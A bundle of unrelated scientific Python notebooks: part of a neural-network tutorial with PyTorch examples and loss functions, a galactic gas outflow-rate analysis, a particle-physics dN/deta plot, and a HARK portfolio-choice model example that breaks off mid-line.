#### Network Layer # # What happens if we replace the vectors $\mathbf{x}$ and $\mathbf{w}$ above with matrices? # $$ # F(X) = \phi\left( X W + \mathbf{b}\right) # $$ # If $X$ has shape $(N, D)$ and holds $N$ samples of $D$ features, then $W$ must have shape $(D, M)$ so $F(X)$ converts the $D$ input features into $M$ output features for each sample. We say that $F$ represents a linear network **layer** with $D$ input nodes and $M$ output nodes. Note that the bias is now a vector of $M$ bias values, one for each output value. # # We cannot really add a vector $\mathbf{b}$ to the matrix $X W$ but we are using the "broadcasting" convention that this means add the same vector to each row (sample) of $X W$. We also cannot apply $\phi(s)$ to a matrix, but we are using the "elementwise" convention that this means apply $\phi$ separately to each element of the matrix. # # To connect this matrix version with our earlier vector version, notice that $F(X)$ transforms a single input sample $\mathbf{x}_i$ (row of $X$) into $M$ different outputs, $f_m(\mathbf{x}_i)$ each with their own weight vector and bias value: # $$ # f_m(\mathbf{x}_i) = \phi\left(\mathbf{x}_i\cdot \mathbf{w}_m + b_m\right) \; , # $$ # where $\mathbf{w}_m$ is the $m$-th column of $W$ and $b_m$ is the $m$-th element of $\mathbf{b}$. # # The corresponding graph (with $D=8$ and $M=4$) is: # # ![NN layer](img/NeuralNetworks/nn_layer.png) # # The `nn_unit` function we defined above already implements a layer if we pass it matrices $X$ and $W$ and a vector $\mathbf{b}$. For example: nn_unit(x=[[1., 0.5], [-1, 1]], w=[[1, -1, 1], [2, 0, 1]], b=[-1, 1, 0], phi=sigmoid) # A layer with $n_{in}$ inputs and $n_{out}$ outputs has a total of $(n_{in} + 1) n_{out}$ parameters. These can add up quickly when building useful networks! # #### Network Graph # # Finally, we can build a simple **fully connected graph** by stacking layers horizontally, which corresponds to nested calls of each layer's function. For example, with 3 layers computed by $F$, $G$, $H$ stacked (left to right), the overall graph computation is: # $$ # N(X) = H\left(G\left(F(X)\right)\right) \; , # $$ # with a corresponding graph: # # ![NN graph](img/NeuralNetworks/nn_graph.png) # # Nodes between the input (leftmost) and output (rightmost) nodes are known as **hidden nodes**. # # The corresponding code for arbitrary layers is: def nn_graph(X, *layers): for W, b, phi in layers: X = nn_unit(X, W, b, phi) return X # For example, here is a three-layer network with the same architecture as the graph above. Note how the output dimension of one layer must match the input dimension of the next layer. nn_graph([1, 2, 3, 4, 5, 6, 7, 8], ([ [11, 12, 13, 14], [21, 22, 23, 24], [31, 32, 33, 34], [41, 42, 43, 44], [51, 52, 53, 54], [61, 62, 63, 64], [71, 72, 73, 74], [81, 82, 83, 84], ], [1, 2, 3, 4], tanh), # LYR1: n_in=8, n_out=4 ([ [11, 12, 13], [21, 22, 23], [31, 32, 33], [41, 42, 43], ], [1, 2, 3], relu), # LYR2: n_in=4, n_out=3 ([ [11, 12], [21, 22], [31, 32], ], [1, 2], sigmoid) # LYR3: n_in=3, n_out=4 ) # The weight and bias values are chosen to make the tensors easier to read, but would not make sense for a real network. As a result, the final output of `[1., 1.]` is not surprising given how the sigmoid activation saturates for input outside a narrow range. # ### Visual Perspective # ![Activation maps](img/NeuralNetworks/activation_maps.png) # + [markdown] solution2="hidden" solution2_first=true # **EXERCISE:** Identify which activation function was used to make each plot above, which shows the building block # $$ # f(\mathbf{x}) = \phi\left(\mathbf{x}\cdot\mathbf{w} + b\right) # $$ # for a 2D $\mathbf{x}$ with the same $\mathbf{w}$ and $b$ used in each plot. Red and blue indicate positive and negative values, respectively, with zero displayed as white. For calibration, (a) shows a "linear" activation which passes its input straight through. # + [markdown] solution2="hidden" # - (a) linear # - (b) tanh # - (c) relu # - (d) softsign # - (e) sigmoid # - (f) elu # # To distinguish between (b) and (d), note that both go asymptotically to constant negative and positive values (so sigmoid is ruled out), but the white transition region is narrower for (d). # # To distinguish between (c) and (f), note that (c) goes asymptotically to zero (white) in the top-left corner, while (e) goes asymptotically to a constant negative value (blue). # # --- # + [markdown] solution2="hidden" solution2_first=true # **EXERCISE:** Experiment with the following function to determine how the displayed arrow relates to the three model parameters $w_0, w_1, b$: # ``` # nn_unit_draw2d(w=[0, 2], b=-1, phi=tanh) # ``` # + [markdown] solution2="hidden" # The arrow has the direction and magnitude of the 2D vector $\mathbf{w}$, with its origin at $\mathbf{x} = -b \mathbf{w}\, / \, |\mathbf{w}|^2$ where $s = 0$. The line $s=0$ is perpendicular to the arrow. # + solution2="hidden" nn_unit_draw2d(w=[2, 1], b=+1, phi=tanh) # - # Study the plots below which show the hidden (left) and output (right) node values for a network with 2 + 2 + 1 nodes. Each graph shows the node value as a function of the 2D input value. # # Note how the hidden nodes divide the input space into two halves, with a dividing line determined by their $\mathbf{w}$ and $b$ values. The output layer then mixes these halves and can therefore "select" any of the four quadrants with an appropriate choice of its $\mathbf{w}$ and $b$. nn_graph_draw2d( ([[2, 0],[-1, -2]], [0, 0], tanh), # LYR1 ([[1], [-1]], [-1], tanh) # LYR2 ) # The histogram on the second layer plot shows the distribution of # $$ # s = X W + b # $$ # feeding its activation function (shown as the dashed curve). Note how the central histogram peak is higher because both the lower-right and upper-left quadrants of $(x_1, x_2)$ have $Y W \simeq 0$. The vertical white line shows how our choice of bias $b = -0.5$ places these quadrants in the "rejected" (blue) category with $s < 0$. # # Generalizing this example, a layer with $n$ inputs can "select" a different $n$-sided (soft-edged) polygon with each of its outputs. To see this in action, try [this demo](https://cs.stanford.edu/people/karpathy/convnetjs/demo/classify2d.html). # ### Data Flow Perspective # The diagram below show the tensors flowing forward (left to right) in a typical fully connected graph. The main flow consists of $N$ input samples flowing from $X_0$ to $X_4$ with a number of features that varies between layers: # $$ # X_{n+1} = \phi\left( X_n\cdot W_{n+1} + \mathbf{b}_{n+1}\right) \; . # $$ # # The computation of each layer's output is parameterized by the weight and bias tensors shown: note how their shapes are determined by the number of input and output features for each layer. The parameter tensors are usually randomly initialized (more on this soon) so only the input $X_0$ and target $Y$ are needed to drive the calculation (and so must be copied to GPU memory when using hardware acceleration). # # The final output $X_4$ is compared with the target values $Y$ to calculate a "loss" $\ell(X_4, Y)$ that decreases as $X_4$ becomes more similar to $Y$ (more on this soon). # # ![forward flow](img/NeuralNetworks/forward_flow.png) # # The diagram below shows the gradient (partial derivative) tensors flowing backwards ("backpropagation") through the same graph using the chain rule: # $$ # \frac{\partial \ell}{\partial X_n} = \frac{\partial \ell}{\partial X_{n+1}} \frac{\partial X_{n+1}}{\partial X_n} # \quad, \quad # \frac{\partial \ell}{\partial W_{n+1}} = \frac{\partial \ell}{\partial X_{n+1}} \frac{\partial X_{n+1}}{\partial W_{n+1}} \; . # $$ # # ![backward flow](img/NeuralNetworks/backward_flow.png) # # Note that these gradient tensors are just numbers, not functions. All of these tensors occupy the (limited) GPU memory when using hardware acceleration but, in most applications, only the final output and the parameter gradients are stored (with 32-bit floating point precision). # # When working with large datasets, the $N$ input samples are usually broken up into fixed-size randomly subsampled "minibatches". Optimiztion with the resulting parameter gradients leads to the "stochastic gradient descent" (SGD) algorithm. # ### PyTorch Primer # A fully connected network can be created with a few lines in PyTorch (for a similar high-level API in Tensorflow checkout [Keras](https://www.tensorflow.org/guide/keras)): # + torch.manual_seed(123) net = torch.nn.Sequential( torch.nn.Linear(8, 4), #0 torch.nn.ReLU(), #1 torch.nn.Linear(4, 3), #2 torch.nn.ReLU(), #3 torch.nn.Linear(3, 2) #4 ) # - # As each `Linear` layer is created, its weight and bias tensors are automatically initialized with random values, so we initially set the torch random seed for reproducible results. # # This construction breaks each layer into separate linear and activation "modules". Each module can be accessed via its index (0-4 in this example): print(net) net[2].weight net[4].bias # To run our network in the forward direction, we need some data with the expected number of features ($D=8$ in this example): N = 100 D = net[0].in_features Xin = torch.randn(N, D) Xout = net(Xin) # The intermediate tensors ($X_1$, $\partial\ell/\partial X_1$, ...) shown in the data flow diagrams above are usually not preserved, but can be useful to help understand how a network is performing and diagnose problems. To cache these intermediate tensors, use: mls.torch.trace(net) Xout = net(Xin) # Each submodule now has `input` and `output` attributes: torch.equal(Xin, net[0].input) torch.equal(net[0].output, net[1].input) # Use the `verbose` option to watch the flow of tensors through the network: mls.torch.trace(net, verbose=True) Xout = net(Xin) # To complete the computational graph we need to calculate a (scalar) loss, for example: loss = torch.mean(Xout ** 2) print(loss) # We can now back propagate gradients of this loss through the network: loss.backward() # The gradients of each layer's parameters are now computed and stored, ready to "learn" better parameters through (stochastic) gradient descent (or one of its variants): net[0].bias.grad # Using `mls.torch.trace` we have also captured the gradients of the loss with respect to each module's outputs $\partial\ell /\partial X_n$: net[0].output.size(), net[0].grad.size() # These gradients can be useful to study since learning of all upstream parameters effectively stops when they become vanishly small (since they multiply those parameter gradients via the chain rule). # ### Statistical Perspective # The tensors behind a practical network contain so many values that it is usually not practical to examine them individually. However, we can still gain useful insights if we study their probability distributions. # # Build a network to process a large dataset so we have some distributions to study: # + torch.manual_seed(123) N, D = 500, 100 Xin = torch.randn(N, D) net = torch.nn.Sequential( torch.nn.Linear(D, 2 * D), torch.nn.Tanh(), torch.nn.Linear(2 * D, D), torch.nn.ReLU(), torch.nn.Linear(D, 10) ) print(net) # - # Note that our network ends with a `Linear` module instead of an activation, which is typical for regression problems. # # Perform forward and backward passes to capture some values: mls.torch.trace(net, verbose=True) Xout = net(Xin) loss = torch.mean(Xout ** 2) loss.backward() # First check that the input to the first module has the expected (unit normal) distribution: plt.hist(net[0].input.reshape(-1), bins=50); # How does torch initialize the parameters (weights and biases) for each layer? plt.hist(net[0].weight.data.reshape(-1), bins=50); plt.hist(net[0].bias.data, bins=50); # These initial parameter values are sampled from uniform distributions centered on zero with a spread that depends on the number of inputs to the layer: # $$ # \left|W_{ij}\right|, \left|b_j\right| \le n_{in}^{-1/2} \; . # $$ # This default choice is based on [empirical studies](https://arxiv.org/abs/1502.01852) of image classification problems where the input features (RGB pixel values) were preprocessed to have zero mean and unit variance. # # With this choice of weights, the first `Linear` module mixes up its input values ($X_0$) but generally preserves Gaussian shape while slightly reducing its variance (which helps prevent the subsequent activation module from saturating): plt.hist(net[0].output.reshape(-1), bins=50); # A scatter plot of the the first `Tanh` activation function's input and output values just traces out the function since it is applied element wise. Note how most of input values do not saturate, which is generally desirable for efficient learning. plt.scatter(net[1].input.reshape(-1), net[1].output.reshape(-1), s=1); # The non-linear activation distorts and clips the output so it no longer resembles a Gaussian: plt.hist(net[1].output.reshape(-1), bins=50); # However, the next `Linear` module restores the Gaussian distribution! How does this happen when neither its inputs nor its parameters have a Gaussian distribution? (Answer: the [central limit theorem](https://en.wikipedia.org/wiki/Central_limit_theorem) which we briefly covered [earlier](https://nbviewer.jupyter.org/github/dkirkby/MachineLearningStatistics/blob/master/notebooks/Statistics.ipynb)). plt.hist(net[2].output.reshape(-1), bins=50); # The next activation is `ReLU`, which effectively piles up all negative values from the previous `Linear` module into the zero bin: plt.scatter(net[3].input.reshape(-1), net[3].output.reshape(-1), s=1); plt.hist(net[3].output.reshape(-1), bins=50); # The final linear layer's output is again roughly Gaussian, thanks to the central limit theorem: plt.hist(net[4].output.reshape(-1), bins=50); # So far we have only looked at distributions of the tensors involved in the forward pass, but there is also a lot to learn from the backwards gradient tensors that we do not have time to delve in to. For example, this scatter plot offers some insight into a suitable learning rate for the second `Linear` module's weight parameters: plt.scatter(net[2].weight.data.reshape(-1), net[2].weight.grad.reshape(-1), s=1); # Note that the normalization of the loss function feeds directly into these gradients, so needs to be considered when setting the learning rate: Xout = net(Xin) loss = 100 * torch.mean(Xout ** 2) loss.backward() plt.scatter(net[2].weight.data.reshape(-1), net[2].weight.grad.reshape(-1), s=1); # ### Loss Functions # In order discover a good set of parameters using optimization, we need to specify a loss function to optimize. # # The loss function $\ell(X_\text{out}, Y_\text{tgt})$ compares the actual network output $X_\text{out}$ with a corresponding target value $Y_\text{tgt}$ and approaches some minimum value as their agreement improves. # # A loss function must be scalar valued since we need a single gradient for each parameter to implement gradient descent, # $$ # \theta \rightarrow \theta - \eta\,\frac{\partial\ell}{\partial\theta} \; . # $$ # Note that the loss normalization is degenerate with the learning rate $\eta$. # # Our choice of loss function is primarily driven by the type of problem we are solving: regression or classification. We introduce the most obvious choices below but there are lots of reasonable variations (see [here](https://pytorch.org/docs/stable/nn.html#id51) for the complete PyTorch list). # #### Regression Loss # For regression, the $L_2$ norm is a popular choice, # $$ # L_2 = \frac{1}{2}\, \left| # X_\text{out} - Y_\text{tgt}\right|^2 \; . # $$ # Optimizing the $L_2$ norm is equivalent to finding the maximum-likelihood (ML) point estimate for the network parameters (weights and biases) if we assume that the uncertainties in $Y_\text{tgt}$ are "homoscedastic" (drawn from the same Gaussian distribution). # # In PyTorch, the $L_2$ norm is implemented as [torch.nn.MSELoss](https://pytorch.org/docs/stable/nn.html#mseloss): Y = torch.zeros_like(Xout) loss = torch.nn.MSELoss()(Xout, Y) # In case you actually have a reasonable estimate $\sigma_Y^i$ of the $i$-th sample's target uncertainty, a better loss function is the $\chi^2$ statistic: # $$ # \chi^2 = \sum_{i=1}^N\, \left( \frac{X_\text{out}^i - Y_\text{tgt}^i}{\sigma_Y^i}\right)^2 \; . # $$ # #### Binary Classification Loss # For binary classification problems, the L2 norm can also be used but the binary [cross entropy](https://en.wikipedia.org/wiki/Cross_entropy) between the target and output probability distributions is often a better choice: # $$ # \text{BCE} \equiv -\sum_{i=1}^N\, \left[ # Y_{tgt}^i \log \phi_S(X_\text{out}^i) + (1 - Y_\text{tgt}^i) \log (1 - \phi_S(X_\text{out}^i)) \right] # $$ # where $\phi_S$ is the sigmoid (aka logistic) activation function used to coerce arbitrary real values into the range $[0,1]$ required for a probability. The value $X_\text{out}^i$ feeding a sigmoid like this is known as a [logit](https://en.wikipedia.org/wiki/Logit). # # The equivalent PyTorch code uses [torch.nn.BCELoss](https://pytorch.org/docs/stable/nn.html#bceloss): Xout = torch.ones(10) Y = torch.zeros(10) loss = torch.nn.BCELoss()(Xout, Y) # The cross entropy is inspired by information theory and closely related to the KL divergence we met [earlier](Variational.ipynb). With this approach, our assumptions are that: # - The target values in $Y_{tgt}$ are all either 0 or 1. # - The network output values in $X_{out}$ are continuous and $\phi_S(y^{out}_i)$ is interpreted as the corresponding probability that the output is 1. # # Note that *something* like the second assumption is necessary to reconcile the different domains of the data and prediction. # # With these assumptions, the likelihood is: # $$ # P(Y_\text{tgt}\mid X_\text{out}) = \begin{cases} # \phi_S(X_\text{out}) & Y_\text{tgt} = 1 \\ # 1 - \phi_S(X_\text{out}) & Y_\text{tgt} = 0 # \end{cases} # $$ # Take a minute to convince yourself that the following expression is equivalent (the case $\phi_S(X_\text{out}(\Theta)) = Y_\text{tgt} = 0$ requires some care since $0^0$ is indeterminate): # $$ # P(Y_\text{tgt}\mid X_\text{out}(\Theta)) = \left[\phi_S(X_\text{out}(\Theta))\right]^{Y_\text{tgt}}\, # \left[1 - \phi_S(X_\text{out}(\Theta))\right]^{1-Y_\text{tgt}} \; . # $$ # Using this form, you can show that the cross entropy loss equals the negative-log-likelihood of the $N$ samples of training data so optimizing BCE is equivalent to finding the ML point estimate of the network parameters under the assumptions above. # # For fixed training data, optimizing BCE is also equivalent to minimizing the KL divergence of the network's predicted discrete probability distribution with respect to the empirical discrete probability distribution of the training data. Therefore, training a binary classification network using the cross-entropy loss is effectively performing a variational inference (VI) to find the network probabilities that are closest to the empirical training probabilities. # #### Multi-category Classification Loss # How can we generalize the binary classification cross-entropy loss to problems with more than two categories? The usual approach is to increase the number of output nodes from 1 to the number of categories $C$, # but we can not directly interpret their values as category probabilities since there is no way to ensure that they sum to one. We could simply require that they are all non-negative and renormalize, but a more more robust approach is to convert the vector of output values $X_\text{out}$ to a corresponding vector of probabilities $\mathbf{p}$ for category $j = 1, 2, \ldots, C$ using the **softmax function**, # $$ # \mathbf{p}(X_\text{out}) \equiv \frac{1}{\sum_{k=1}^C\, \exp(X_\text{out}^k)}\, # [ \exp(X_\text{out}^1), \exp(X_\text{out}^2), \ldots, \exp(X_\text{out}^C) ] \; , # $$ # which works fine with positive or negative outputs $X_\text{out}^j$. Note that softmax generalizes the sigmoid function $\phi_S$ in the following sense: # $$ # \mathbf{p}([y_1, y_2]) = [\,\phi_S(y_1-y_2)\,,\, 1 - \phi_S(y_1-y_2)\,] \; . # $$ def softmax(y): # subtract out max(y) improve the numerical accuracy expy = np.exp(y - np.max(y)) return expy / expy.sum() softmax([2, -1, 3]) # The softmax function effectively implements a *winner takes all* policy, similar to the sigmoid activation $\phi_S$, as illustrated in the plot below where: # - the color scale indicates, from left to right, $p_1, p_2$ and $p_3$ for three categories, # - $y_1$ and $y_2$ are varied over the same range, and # - $y_3$ is fixed to the middle of this range. # + def plot_softmax(ylo, yhi, n=100): y_grid = np.linspace(ylo, yhi, n) y3 = 0.5 * (ylo + yhi) p_grid = np.array([softmax([y1, y2, y3]) for y1 in y_grid for y2 in y_grid]).reshape(n, n, 3) _, ax = plt.subplots(1, 3, figsize=(10.5, 3)) for k in range(3): ax[k].imshow(p_grid[:, :, k], interpolation='none', origin='lower', extent=[ylo, yhi, ylo, yhi]) ax[k].set_xlabel('$y_1$') ax[k].set_ylabel('$y_2$') if k != 0: ax[k].axvline(y3, c='gray', ls='--') if k != 1: ax[k].axhline(y3, c='gray', ls='--') if k != 2: ax[k].plot([ylo, yhi], [ylo, yhi], c='gray', ls='--') ax[k].grid(False) plot_softmax(0, 15) # - # The example above assumed output activations that can be large and positive, such as `relu` or `elu`. However, the strength of the *winner takes all* effect depends on how the outputs are scaled, and is relatively weak for output activations that saturate on both sides, such as `sigmoid` or `tanh`, which is why these are generally not used for classification outputs: plot_softmax(-1, +1) # Note that we assume **one-hot encoding** of the vector target values $\mathbf{y}^{out}$, which is not very efficient (unless using sparse-optimized data structures) compared to a single integer target value $y^{train} = 0, 1, \ldots, C-1$. However, sklearn has a [convenient utility](http://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.OneHotEncoder.html) to convert integers to one-hot encoded vectors (use `sparse=True` to return vectors in an efficient [scipy sparse array](https://docs.scipy.org/doc/scipy/reference/sparse.html)).
notebooks/NeuralNetworks.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: 'Python 3.7.3 64-bit (''base'': conda)' # language: python # name: python37364bitbaseconda59fdcd74f7b646b8b675b4f21f43d693 # --- import numpy as np import matplotlib.pyplot as plt import matplotlib.ticker as ticker import h5py import math import scipy.integrate as int import numba # + time = 100 # number of snapshots in 0 -- 1 Gyr H = 4 # height from galactic plane in kpc alpha = 3.1536e7/3.085677581e16 # 1 km/sec in kpc/yr models = ["Osaka2019_isogal"] #, "geodome_model/geodome_original"\ #, "geodome_model/ver_19.11.1"] snapshot = [[0]*time for i in range(len(models))] subfind = [[0]*time for i in range(len(models))] MassOutFlowRate = [[0]*time for i in range(len(models))] MassOutFlowRate_S19 = [[0]*time for i in range(len(models))] MassOutFlowRate_r02 = [[0]*time for i in range(len(models))] MassOutFlowRate_r05 = [[0]*time for i in range(len(models))] MassOutFlowRate_r10 = [[0]*time for i in range(len(models))] MassOutFlowRate_r20 = [[0]*time for i in range(len(models))] SFR = [[0]*time for i in range(len(models))] for i in range(len(models)): for j in range(time): snapshot[i][j] = h5py.File('/home/oku/data_2019/isogal/{0}/snapshot_{1:03}/snapshot_{1:03}.hdf5'.format(models[i], j), 'r') subfind[i][j] = h5py.File('/home/oku/data_2019/isogal/{0}/snapshot_{1:03}/groups_{1:03}/sub_{1:03}.hdf5'.format(models[i], j), 'r') # - # ## Kernel function # + def W3(r, h): r = abs(r)/h C = 8/h**3/math.pi if r > 1: return 0 elif r > 1/2: return C*2*(1-r)**3 else: return C*(1 - 6*r**2 + 6*r**3) def func(x,h,z): return W3(math.sqrt(z**2 + x**2),h)*2*math.pi*x def integral(hsml, z): return int.quad(func, 0, math.sqrt(hsml**2 - z**2), args=(hsml, z))[0] np_W3 = np.frompyfunc(W3,2,1) np_int = np.frompyfunc(integral,2,1) # - # ## Gas outflow rate @numba.jit def main(Z, hsml, Vz, M, H): dz = np.abs(np.abs(Z) - H) index_p = np.where((dz < hsml) & (Z > 0) & (Vz > 0)) index_m = np.where((dz < hsml) & (Z < 0) & (Vz < 0)) npdotM_m = np_int(hsml[index_m[0]], dz[index_m[0]])*M[index_m[0]]*np.abs(Vz[index_m[0]]) npdotM_p = np_int(hsml[index_p[0]], dz[index_p[0]])*M[index_p[0]]*np.abs(Vz[index_p[0]]) dotM = np.sum(npdotM_m) + np.sum(npdotM_p) return dotM @numba.jit def main_r(X, Y, Z, hsml, Vz, M, H, R): dz = np.abs(np.abs(Z) - H) r = np.sqrt(X*X + Y*Y) index_p = np.where((dz < hsml) & (Z > 0) & (Vz > 0) & (r < R)) index_m = np.where((dz < hsml) & (Z < 0) & (Vz < 0) & (r < R)) npdotM_m = np_int(hsml[index_m[0]], dz[index_m[0]])*M[index_m[0]]*np.abs(Vz[index_m[0]]) npdotM_p = np_int(hsml[index_p[0]], dz[index_p[0]])*M[index_p[0]]*np.abs(Vz[index_p[0]]) dotM = np.sum(npdotM_m) + np.sum(npdotM_p) return dotM @numba.jit def main_S19(Z, hsml, Vz, M, density, H): rho_tot = sum(density*density) zcenter = sum(Z*density*density) zcenter = zcenter/rho_tot Z = Z-zcenter dz = np.abs(np.abs(Z) - H) index_p = np.where((dz < hsml) & (Z > 0) & (Vz > 0)) index_m = np.where((dz < hsml) & (Z <= 0) & (Vz < 0)) wk = np_W3(dz, hsml) area = math.pi*(hsml*hsml - dz*dz) rho = M*wk npdotM = rho*np.abs(Vz)*area dotM = np.sum(npdotM[index_m[0]]) + np.sum(npdotM[index_p[0]]) return dotM for k in range(len(models)): for t in range(time): GalPos = subfind[k][t]['Group/GroupPos'][0] GalVel = subfind[k][t]['Subhalo/SubhaloVel'][0] X = np.array(snapshot[k][t]['PartType0/Coordinates']).T[0] Y = np.array(snapshot[k][t]['PartType0/Coordinates']).T[1] Z = np.array(snapshot[k][t]['PartType0/Coordinates']).T[2] hsml = np.array(snapshot[k][t]['PartType0/SmoothingLength']) Vz = np.array(snapshot[k][t]['PartType0/Velocities']).T[2] M = np.array(snapshot[k][t]['PartType0/Masses']) density = np.array(snapshot[k][t]['PartType0/Density']) dotM = 0.0 dotM_S19 = 0.0 dotM = main(Z-GalPos[2], hsml, Vz-GalVel[2], M, H) dotM_S19 = main_S19(Z, hsml, Vz, M, density, H) dotM_r02 = main_r(X-GalPos[0], Y-GalPos[1], Z-GalPos[2], hsml, Vz-GalVel[2], M, H, 2) dotM_r05 = main_r(X-GalPos[0], Y-GalPos[1], Z-GalPos[2], hsml, Vz-GalVel[2], M, H, 5) dotM_r10 = main_r(X-GalPos[0], Y-GalPos[1], Z-GalPos[2], hsml, Vz-GalVel[2], M, H, 10) dotM_r20 = main_r(X-GalPos[0], Y-GalPos[1], Z-GalPos[2], hsml, Vz-GalVel[2], M, H, 20) MassOutFlowRate[k][t] = dotM*1e10*alpha MassOutFlowRate_S19[k][t] = dotM_S19*1e10*alpha MassOutFlowRate_r02[k][t] = dotM_r02*1e10*alpha MassOutFlowRate_r05[k][t] = dotM_r05*1e10*alpha MassOutFlowRate_r10[k][t] = dotM_r10*1e10*alpha MassOutFlowRate_r20[k][t] = dotM_r20*1e10*alpha SFR[k][t] = np.sum(np.array(snapshot[k][t]['PartType0/StarFormationRate'])) # print("t {}, dotM {}, dotM_approx {}".format(t, dotM, dotM_approx)) timestep = np.linspace(0,0.99,100) plt.plot(timestep,MassOutFlowRate_r02[0], label="R = 2kpc") plt.plot(timestep,MassOutFlowRate_r05[0], label="R = 5kpc") plt.plot(timestep,MassOutFlowRate_r10[0], label="R = 10kpc") plt.plot(timestep,MassOutFlowRate_r20[0], label="R = 20kpc") plt.plot(timestep,MassOutFlowRate[0], label=r"R = $\infty$") plt.yscale('log') plt.ylabel('Mass outflow rate [Msun/yr]') plt.xlabel('Time [Gyr]') plt.legend(bbox_to_anchor=(1, 0), loc='lower right') # plt.savefig("OutflowRate4kpc_R.pdf") timestep = np.linspace(0,0.99,100) plt.plot(timestep,np.array(MassOutFlowRate_S19[0])*np.sqrt(timestep), label="Shimizu et al. (2019)") plt.plot(timestep,MassOutFlowRate_S19[0], linestyle="dashed", label=r"$\sqrt{t/1\,{\rm Gyr}}$ fixed") plt.plot(timestep,MassOutFlowRate[0], linestyle="dotted", label=r"$\sqrt{t/1\,{\rm Gyr}}$ fixed & Eq. (2)") plt.yscale('log') plt.ylabel('Mass outflow rate [Msun/yr]') plt.xlabel('Time [Gyr]') plt.legend(bbox_to_anchor=(1, 0), loc='lower right') #plt.savefig("OutflowRate4kpc.pdf") # + data = [0]*len(models) for i in range(len(models)): data[i] = np.loadtxt('/home/oku/data_2019/isogal/{}/data/{}'.format(models[i], H)) for i in range(len(models)): plt.plot(MassOutFlowRate[i],linestyle="dashed",label="{} my code (my method)".format(models[i])) plt.plot(MassOutFlowRate_S19[i],label="{} my code (Shimizu19 method)".format(models[i])) plt.plot(data[i].T[2],linestyle="dotted", label="{} Shimizu19 code".format(models[i])) plt.yscale('log') plt.ylabel('Mass outflow rate [Msun/yr]') plt.xlabel('time [10Myr]') plt.legend(bbox_to_anchor=(1, 0), loc='lower left') # plt.savefig('OutFlowRate4kpc.pdf',bbox_inches="tight") # - for i in range(len(models)): plt.plot(np.array(MassOutFlowRate[i])/np.array(SFR[i]),linestyle="dashed",label="{} my code (my method)".format(models[i])) plt.plot(np.array(MassOutFlowRate_S19[i])/np.array(SFR[i]),label="{} my code (Shimizu19 method)".format(models[i])) plt.plot(data[i].T[1],linestyle="dotted", label="{} Shimizu19 code".format(models[i])) plt.yscale('log') plt.ylabel('Mass loading factor') plt.xlabel('time [10Myr]') plt.legend(bbox_to_anchor=(1, 0), loc='lower left') # plt.savefig("MassLoadingFactor4kpc.pdf",bbox_inches="tight") plt.plot(SFR[0], label="my code") plt.plot(data[0].T[3],label="Shimizu19 code") plt.ylabel('SFR') plt.xlabel('time') plt.grid() plt.legend() # plt.savefig("SFR.pdf")
OutflowRate.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import pandas as pd import numpy as np from matplotlib import pyplot as plt import math import os # + dndeta_exp=pd.read_csv("C:\\Users\\LPO\\Desktop\\vyzkumak\\dndeta_exp.dat", sep="\t", header=None, names=["rap", "rap_max", "rap_min","dndeta","chyba","chybaminus"]) dndeta=pd.read_csv("C:\\Users\\LPO\\Desktop\\vyzkumak\\dndeta.dat", sep="\t", header=None, names=["rap","dndeta"]) # + fig, axes = plt.subplots(sharex=True, figsize=(9,8)) #axes.errorbar(dndeta_exp["rap"],dndeta_exp["dndeta"], yerr =(dndeta_exp["chyba"]), marker='x',color='red',fmt='o', ecolor='red', capthick=50, label="ALICE data") axes.errorbar(dndeta_exp["rap"],dndeta_exp["dndeta"], yerr =(dndeta_exp["chyba"]), fmt='o',ecolor='r',color='black',elinewidth=2,capsize=4, label="CERN ALICE data") axes.plot(dndeta["rap"],dndeta["dndeta"], 'o', color='darkcyan', label="Trento IS Pb-Pb 2.76TeV 20-30%") axes.grid(True) axes.set_xlim([-6, 6]) axes.set_ylim([0, 900]) axes.set_xlabel('$\eta$',fontsize=15) axes.set_ylabel('$ \dfrac{dN}{d\eta}$',fontsize=15) axes.legend(loc=2,fontsize=12) # -
dndeta-checkpoint.ipynb
''' Example implementations of HARK.ConsumptionSaving.ConsPortfolioModel ''' from HARK.ConsumptionSaving.ConsPortfolioModel import PortfolioConsumerType, init_portfolio from HARK.ConsumptionSaving.ConsIndShockModel import init_lifecycle from HARK.utilities import plotFuncs from copy import copy from time import time import numpy as np import matplotlib.pyplot as plt # Make and solve an example portfolio choice consumer type print('Now solving an example portfolio choice problem; this might take a moment...') MyType = PortfolioConsumerType() MyType.cycles = 0 t0 = time() MyType.solve() t1 = time() MyType.cFunc = [MyType.solution[t].cFuncAdj for t in range(MyType.T_cycle)] MyType.ShareFunc = [MyType.solution[t].ShareFuncAdj for t in range(MyType.T_cycle)] print('Solving an infinite horizon portfolio choice problem took ' + str(t1-t0) + ' seconds.') # Compute the Merton-Samuelson limiting portfolio share when returns are lognormal MyType.RiskyVar = MyType.RiskyStd**2 MyType.RiskPrem = MyType.RiskyAvg - MyType.Rfree def RiskyShareMertSamLogNormal(RiskPrem,CRRA,RiskyVar): return RiskPrem/(CRRA*RiskyVar) # Plot the consumption and risky-share functions print('Consumption function over market resources:') plotFuncs(MyType.cFunc[0], 0., 20.) print('Risky asset share as a function of market resources:') print('Optimal (blue) versus Theoretical Limit (orange)') plt.xlabel('Normalized Market Resources') plt.ylabel('Portfolio Share') plt.ylim(0.0,1.0) # Since we are using a discretization of the lognormal distribution, # the limit is numerically computed and slightly different from # the analytical limit obtained by Merton and Samuelson for infinite wealth plotFuncs([MyType.ShareFunc[0] # ,lambda m: RiskyShareMertSamLogNormal(MyType.RiskPrem,MyType.CRRA,MyType.RiskyVar)*np.ones_like(m) ,lambda m: MyType.ShareLimit*np.ones_like(m) ] , 0., 200.) # Now simulate this consumer type MyType.track_vars = ['cNrmNow', 'aNrmNow', 't_age'] MyType.T_sim = 100 MyType.initializeSim() MyType.simulate() print('\n\n\n') print('For derivation of the numerical limiting portfolio share') print('as market resources approach infinity, see') print('http://www.econ2.jhu.edu/people/ccarroll/public/lecturenotes/AssetPricing/Portfolio-CRRA/') "" # Make another example type, but this one optimizes risky portfolio share only # on the discrete grid of values implicitly chosen by RiskyCount, using explicit # value maximization. init_discrete_share = init_portfolio.copy() init_discrete_share['DiscreteShareBool'] = True init_discrete_share['vFuncBool'] = True # Have to actually construct value function for this to work # Make and solve a discrete portfolio choice consumer type print('Now solving a discrete choice portfolio problem; this might take a minute...') DiscreteType = 